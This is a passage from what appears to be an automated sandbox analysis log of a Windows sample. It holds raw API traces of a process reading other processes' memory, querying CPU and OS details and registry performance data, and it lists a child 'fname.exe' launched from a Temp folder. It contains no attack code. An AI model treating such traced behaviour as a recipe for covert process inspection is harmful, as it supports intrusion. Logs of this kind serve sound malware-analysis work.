lpNumberOfBytesRead=0x0) returned 1 [0265.072] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x402c00, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0265.072] malloc (_Size=0xce) returned 0xd9d190 [0265.072] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x403308, lpBuffer=0xd9d190, nSize=0xcc, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xd9d190*, lpNumberOfBytesRead=0x0) returned 1 [0265.073] free (_Block=0xd9d190) [0265.074] CloseHandle (hObject=0x28c) returned 1 [0265.075] _ui64tow_s (in: _Value=0x1340, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="4928") returned 0x0 [0265.075] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="4928") returned 4 [0265.075] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0265.076] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0265.077] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1340) returned 0x0 [0265.077] CloseHandle (hObject=0x0) returned 0 [0265.077] _ui64tow_s (in: _Value=0x1384, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="4996") returned 0x0 [0265.078] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="4996") returned 4 [0265.078] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0265.079] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0265.080] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1384) returned 0x28c [0265.080] GetLastError () returned 0x0 [0265.080] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0265.080] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x236018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0265.080] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0265.080] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4036b0, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0265.081] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4032f6, lpBuffer=0x138c580, nSize=0x56, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0265.081] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0265.081] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0265.082] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x236020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0265.082] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x402b90, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0265.082] malloc (_Size=0xce) returned 0xd9d190 [0265.082] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x40334c, lpBuffer=0xd9d190, nSize=0xcc, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xd9d190*, lpNumberOfBytesRead=0x0) returned 1 [0265.083] free (_Block=0xd9d190) [0265.083] CloseHandle (hObject=0x28c) returned 1 [0265.084] _ui64tow_s (in: _Value=0x1270, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="4720") returned 0x0 [0265.084] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="4720") returned 4 [0265.084] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0265.084] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0265.085] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1270) returned 0x28c [0265.086] GetLastError () returned 0x0 [0265.086] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0265.086] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x35f018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0265.086] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0265.086] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4036b0, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0265.086] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4032f6, lpBuffer=0x138c580, nSize=0x56, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0265.087] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0265.087] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0265.088] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x35f020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0265.088] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x402b90, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0265.088] malloc (_Size=0xce) returned 0xd9d190 [0265.088] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x40334c, lpBuffer=0xd9d190, nSize=0xcc, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xd9d190*, lpNumberOfBytesRead=0x0) returned 1 [0265.089] free (_Block=0xd9d190) [0265.089] CloseHandle (hObject=0x28c) returned 1 [0265.089] _ui64tow_s (in: _Value=0x13f0, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="5104") returned 0x0 [0265.090] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="5104") returned 4 [0265.090] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0265.090] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0265.091] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x13f0) returned 0x0 [0265.091] CloseHandle (hObject=0x0) returned 0 [0265.092] _ui64tow_s (in: _Value=0x9c8, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="2504") returned 0x0 [0265.092] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="2504") returned 4 [0265.092] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0265.092] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0265.093] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9c8) returned 0x28c [0265.093] GetLastError () returned 0x0 [0265.094] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0265.094] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x373018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0265.094] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0265.094] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x531d80, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0265.094] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x531958, lpBuffer=0x138c580, nSize=0x7c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0265.095] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0265.095] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0265.095] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x373020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0265.095] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x531340, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0265.096] malloc (_Size=0x82) returned 0xd9d190 [0265.096] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x5319d4, lpBuffer=0xd9d190, nSize=0x80, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xd9d190*, lpNumberOfBytesRead=0x0) returned 1 [0265.097] free (_Block=0xd9d190) [0265.097] CloseHandle (hObject=0x28c) returned 1 [0265.102] _ui64tow_s (in: _Value=0x13d0, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="5072") returned 0x0 [0265.102] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="5072") returned 4 [0265.103] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0265.103] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0265.104] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x13d0) returned 0x28c [0265.104] GetLastError () returned 0x0 [0265.104] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0265.104] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x3d7018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0265.105] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x20, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810, lpNumberOfBytesRead=0x0) returned 0 [0265.105] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0265.105] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0265.105] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x3d7020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0265.105] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x10000, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0265.106] malloc (_Size=0xda) returned 0xd9d190 [0265.106] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x106ea, lpBuffer=0xd9d190, nSize=0xd8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xd9d190*, lpNumberOfBytesRead=0x0) returned 1 [0265.106] free (_Block=0xd9d190) [0265.107] CloseHandle (hObject=0x28c) returned 1 [0265.146] free (_Block=0xdb8710) [0265.146] malloc (_Size=0x48) returned 0xdacb00 [0265.146] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x138d6d0 | out: lpSystemTimeAsFileTime=0x138d6d0*(dwLowDateTime=0x6bb822e2, dwHighDateTime=0x1d86028)) [0265.146] SetEvent (hEvent=0x248) returned 1 [0268.441] malloc (_Size=0x600) returned 0xdb6400 [0268.441] GetLogicalProcessorInformationEx (in: RelationshipType=0xffff, Buffer=0x0, ReturnedLength=0x138d7f8 | out: Buffer=0x0, ReturnedLength=0x138d7f8) returned 0 [0268.442] GetLastError () returned 0x7a [0268.442] malloc (_Size=0x250) returned 0xdb7420 [0268.442] GetLogicalProcessorInformationEx (in: RelationshipType=0xffff, Buffer=0xdb7420, ReturnedLength=0x138d7f8 | out: Buffer=0xdb7420, ReturnedLength=0x138d7f8) returned 1 [0268.442] GetActiveProcessorCount (GroupNumber=0xffff) returned 0x4 [0268.442] GetMaximumProcessorGroupCount () returned 0x1 [0268.442] malloc (_Size=0x40) returned 0xdacc90 [0268.442] malloc (_Size=0x40) returned 0xdacce0 [0268.442] malloc (_Size=0x8) returned 0xdb5860 [0268.442] memcpy (in: _Dst=0xdacc90, _Src=0xdb7440, _Size=0x10 | out: _Dst=0xdacc90) returned 0xdacc90 [0268.509] GetActiveProcessorCount (GroupNumber=0x0) returned 0x4 [0268.510] NtPowerInformation (in: InformationLevel=0x2e, InputBuffer=0x138d7f0, InputBufferLength=0x2, OutputBuffer=0xdb6400, OutputBufferLength=0x60 | out: OutputBuffer=0xdb6400) returned 0x0 [0268.510] _vsnwprintf (in: _Buffer=0x138d690, _BufferCount=0x63, _Format="CPU%d", _ArgList=0x138cf88 | out: _Buffer="CPU0") returned 4 [0268.510] GetCurrentThread () returned 0xfffffffffffffffe [0268.510] SetThreadGroupAffinity (in: hThread=0xfffffffffffffffe, GroupAffinity=0x138cee0, PreviousGroupAffinity=0x138cef0 | out: PreviousGroupAffinity=0x138cef0) returned 1 [0268.511] GetSystemInfo (in: lpSystemInfo=0x138d020 | out: lpSystemInfo=0x138d020*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0268.511] mbstowcs (in: _Dest=0x138d2a8, _Source="GenuineIntel", _MaxCount=0x28 | out: _Dest="GenuineIntel") returned 0xc [0268.511] _wcsicmp (_String1="GenuineIntel", _String2="GenuineIntel") returned 0 [0268.514] mbstowcs (in: _Dest=0x138d118, _Source="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz", _MaxCount=0x28 | out: _Dest="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 0x27 [0268.514] GetCurrentThread () returned 0xfffffffffffffffe [0268.514] SetThreadGroupAffinity (in: hThread=0xfffffffffffffffe, GroupAffinity=0x138cef0, PreviousGroupAffinity=0x0 | out: PreviousGroupAffinity=0x0) returned 1 [0268.515] LoadStringW (in: hInstance=0x7ffd8ecc0000, uID=0x2c, lpBuffer=0x138ccf0, cchBufferMax=256 | out: lpBuffer="CPU %d") returned 0x6 [0277.889] malloc (_Size=0x34c34) returned 0xdb9030 [0277.899] _wtoi (_String="238") returned 238 [0277.899] _wtoi (_String="6") returned 6 [0277.899] _itow (in: _Dest=0x0, _Radix=20501952 | out: _Dest=0x0) returned="0" [0277.900] _itow (in: _Dest=0xee, _Radix=20500240 | out: _Dest=0xee) returned="238" [0277.900] malloc (_Size=0x4000) returned 0xdedc70 [0277.900] RegQueryValueExW (in: hKey=0xffffffff80000004, lpValueName="238", lpReserved=0x0, lpType=0x0, lpData=0xdedc70, lpcbData=0x138cee4*=0x4000 | out: lpType=0x0, lpData=0xdedc70*=0x50, lpcbData=0x138cee4*=0x600) returned 0x0 [0278.092] free (_Block=0xdedc70) [0278.092] Sleep (dwMilliseconds=0x3e8) [0279.093] _itow (in: _Dest=0xee, _Radix=20500240 | out: _Dest=0xee) returned="238" [0279.093] malloc (_Size=0x4000) returned 0xdedc70 [0279.093] RegQueryValueExW (in: hKey=0xffffffff80000004, lpValueName="238", lpReserved=0x0, lpType=0x0, lpData=0xdedc70, lpcbData=0x138cee4*=0x4000 | out: lpType=0x0, lpData=0xdedc70*=0x50, lpcbData=0x138cee4*=0x600) returned 0x0 [0279.173] free (_Block=0xdedc70) [0279.176] free (_Block=0xdb9030) [0279.182] _vsnwprintf (in: _Buffer=0x138d5c0, _BufferCount=0x40, _Format="%04X%04X%04X%04X", _ArgList=0x138cf88 | out: _Buffer="0F8BFBFF00050654") returned 16 [0279.185] lstrlenW (lpString=" 0") returned 2 [0279.185] lstrlenW (lpString="Intel(R) Xeon(R) Gold 6126 CPU @ 2.60GHz") returned 40 [0279.186] lstrlenW (lpString="") returned 0 [0279.186] lstrlenW (lpString="") returned 0 [0279.186] lstrlenW (lpString="") returned 0 [0279.189] IsProcessorFeaturePresent (ProcessorFeature=0x14) returned 1 [0279.189] IsProcessorFeaturePresent (ProcessorFeature=0x15) returned 1 [0279.192] RtlNumberOfSetBitsUlongPtr (Target=0x1) returned 0x1 [0279.192] RtlNumberOfSetBitsUlongPtr (Target=0x2) returned 0x1 [0279.192] RtlNumberOfSetBitsUlongPtr (Target=0x4) returned 0x1 [0279.192] RtlNumberOfSetBitsUlongPtr (Target=0x8) returned 0x1 [0279.192] _vsnwprintf (in: _Buffer=0x138d880, _BufferCount=0x63, _Format="CPU%d", _ArgList=0x138d7c8 | out: _Buffer="CPU0") returned 4 [0279.194] free (_Block=0xdb5860) [0279.195] free (_Block=0xdacce0) [0279.195] free (_Block=0xdacc90) [0279.196] free (_Block=0xdb7420) [0279.197] free (_Block=0xdb6400) Thread: id = 115 os_tid = 0xb38 Thread: id = 116 os_tid = 0xe48 [0265.147] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ff60 | out: lpSystemTimeAsFileTime=0x128ff60*(dwLowDateTime=0x6bb83831, dwHighDateTime=0x1d86028)) [0265.147] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ff68 | out: lpSystemTimeAsFileTime=0x128ff68*(dwLowDateTime=0x6bb849e8, dwHighDateTime=0x1d86028)) [0265.147] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ff70 | out: lpSystemTimeAsFileTime=0x128ff70*(dwLowDateTime=0x6bb849e8, dwHighDateTime=0x1d86028)) [0265.147] WaitForSingleObjectEx (hHandle=0x248, dwMilliseconds=0x493df, bAlertable=0) returned 0x102 [0275.209] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ff60 | out: lpSystemTimeAsFileTime=0x128ff60*(dwLowDateTime=0x71b7a7b0, dwHighDateTime=0x1d86028)) [0275.210] free (_Block=0xdb6320) [0275.210] FreeLibrary (hLibModule=0x7ffdab590000) returned 1 [0275.211] free (_Block=0xd9cb70) [0275.213] free (_Block=0xdacb00) [0275.214] WaitForSingleObjectEx (hHandle=0x248, dwMilliseconds=0xffffffff, bAlertable=0) Thread: id = 117 os_tid = 0xe3c Thread: id = 118 os_tid = 0xe34 Thread: id = 119 os_tid = 0xe1c Process: id = "6" image_name = "fname.exe" filename = "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\fname.exe" page_root = "0x351ed000" os_pid = "0xf94" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x9c8" cmd_line = "\"C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\fname.exe\" " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fe14" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3365 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3366 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3367 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3368 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3369 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3370 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3371 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3372 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3373 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3374 start_va = 0x1140000 end_va = 0x14bdfff monitored = 1 entry_point = 0x13630b1 region_type = mapped_file name = "fname.exe" filename = "\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\fname.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\fname.exe") Region: id = 3375 start_va = 0x77830000 end_va = 0x779aafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3376 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3377 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3378 start_va = 0x7fff0000 end_va = 0x7ffdab58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3379 start_va = 0x7ffdab590000 end_va = 0x7ffdab750fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3380 start_va = 0x7ffdab751000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffdab751000" filename = "" Region: id = 3381 start_va = 0x4c0000 end_va = 0x4cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 3382 start_va = 0x639e0000 end_va = 0x63a2ffff monitored = 0 entry_point = 0x639f8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3383 start_va = 0x63a40000 end_va = 0x63ab9fff monitored = 0 entry_point = 0x63a53290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3384 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3385 start_va = 0x63a30000 end_va = 0x63a37fff monitored = 0 entry_point = 0x63a317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3386 start_va = 0x4d0000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 3387 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3388 start_va = 0x77420000 end_va = 0x7759dfff monitored = 0 entry_point = 0x774d1b90 region_type = mapped_file name = 